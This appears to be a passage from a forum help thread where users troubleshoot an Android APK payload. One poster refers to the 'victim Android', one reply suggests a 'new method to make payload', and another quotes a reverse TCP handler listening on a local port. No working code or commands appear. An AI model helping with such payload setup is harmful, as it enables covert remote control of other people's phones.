I cannot download the apk in my android device

After installing the app in my Android device its showing

can any one help out with this

after install the apk in mobile its gets crash hwo do i fix this

This is what the victim Android is showing when I tried to install it and yes unknown sorces was enable

your android version might not support this use the new method to make payload

I am stuck at "started reverse TCP handler on 127.0.0.1:5555"